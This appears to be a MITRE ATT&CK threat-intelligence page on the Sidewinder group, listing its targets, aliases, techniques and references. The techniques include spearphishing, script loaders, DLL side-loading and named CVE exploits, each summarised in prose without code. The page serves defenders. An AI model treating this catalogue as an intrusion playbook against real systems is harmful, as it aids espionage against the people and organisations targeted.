G0121 Sidewinder
Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.321
| Item | Value |
|---|---|
| ID | G0121 |
| Associated Names | T-APT-04, Rattlesnake |
| Version | 1.1 |
| Created | 27 January 2021 |
| Last Modified | 22 March 2023 |
| Navigation Layer | View In ATT&CK® Navigator |
Associated Group Descriptions
| Name | Description |
|---|---|
| T-APT-04 | 1 |
| Rattlesnake | 1 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1071 | Application Layer Protocol | - |
| enterprise | T1071.001 | Web Protocols | Sidewinder has used HTTP in C2 communications.354 |
| enterprise | T1119 | Automated Collection | Sidewinder has used tools to automatically collect system and network configuration information.3 |
| enterprise | T1020 | Automated Exfiltration | Sidewinder has configured tools to automatically send collected files to attacker controlled servers.3 |
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.001 | Registry Run Keys / Startup Folder | Sidewinder has added paths to executables in the Registry to establish persistence.541 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Sidewinder has used PowerShell to drop and execute malware loaders.3 |
| enterprise | T1059.005 | Visual Basic | Sidewinder has used VBScript to drop and execute malware loaders.3 |
| enterprise | T1059.007 | JavaScript | Sidewinder has used JavaScript to drop and execute malware loaders.34 |
| enterprise | T1074 | Data Staged | - |
| enterprise | T1074.001 | Local Data Staging | Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration.3 |
| enterprise | T1203 | Exploitation for Client Execution | Sidewinder has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674.31 |
| enterprise | T1083 | File and Directory Discovery | Sidewinder has used malware to collect information on files and directories.3 |
| enterprise | T1574 | Hijack Execution Flow | - |
| enterprise | T1574.002 | DLL Side-Loading | Sidewinder has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.3 |
| enterprise | T1105 | Ingress Tool Transfer | Sidewinder has used LNK files to download remote files to the victim’s network.31 |
| enterprise | T1559 | Inter-Process Communication | - |
| enterprise | T1559.002 | Dynamic Data Exchange | Sidewinder has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.54 |
| enterprise | T1036 | Masquerading | - |
| enterprise | T1036.005 | Match Legitimate Name or Location | Sidewinder has named malicious files rekeywiz.exe to match the name of a legitimate Windows executable.4 |
| enterprise | T1027 | Obfuscated Files or Information | Sidewinder has used base64 encoding and ECDH-P256 encryption for payloads.351 |
| enterprise | T1027.010 | Command Obfuscation | Sidewinder has used base64 encoding for scripts.35 |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.001 | Spearphishing Attachment | Sidewinder has sent e-mails with malicious attachments often crafted for specific targets.3 |
| enterprise | T1566.002 | Spearphishing Link | Sidewinder has sent e-mails with malicious links often crafted for specific targets.31 |
| enterprise | T1598 | Phishing for Information | - |
| enterprise | T1598.002 | Spearphishing Attachment | Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites.351 |
| enterprise | T1598.003 | Spearphishing Link | Sidewinder has sent e-mails with malicious links to credential harvesting websites.3 |
| enterprise | T1057 | Process Discovery | Sidewinder has used tools to identify running processes on the victim’s machine.3 |
| enterprise | T1518 | Software Discovery | Sidewinder has used tools to enumerate software installed on an infected host.35 |
| enterprise | T1518.001 | Security Software Discovery | Sidewinder has used the Windows service winmgmts:\.\root\SecurityCenter2 to check installed antivirus products.5 |
| enterprise | T1218 | System Binary Proxy Execution | - |
| enterprise | T1218.005 | Mshta | Sidewinder has used mshta.exe to execute malicious payloads.54 |
| enterprise | T1082 | System Information Discovery | Sidewinder has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host.34 |
| enterprise | T1016 | System Network Configuration Discovery | Sidewinder has used malware to collect information on network interfaces, including the MAC address.3 |
| enterprise | T1033 | System Owner/User Discovery | Sidewinder has used tools to identify the user of a compromised host.3 |
| enterprise | T1124 | System Time Discovery | Sidewinder has used tools to obtain the current system time.3 |
| enterprise | T1204 | User Execution | - |
| enterprise | T1204.001 | Malicious Link | Sidewinder has lured targets to click on malicious links to gain execution in the target environment.3541 |
| enterprise | T1204.002 | Malicious File | Sidewinder has lured targets to click on malicious files to gain execution in the target environment.3541 |
Software
References
-
Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021. ↩↩↩↩↩↩↩↩↩↩↩
-
Global Research and Analysis Team . (2018, April 12). APT Trends report Q1 2018. Retrieved January 27, 2021. ↩
-
Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩
-
Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021. ↩↩↩↩↩↩↩↩↩
-
Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021. ↩↩↩↩↩↩↩↩↩↩↩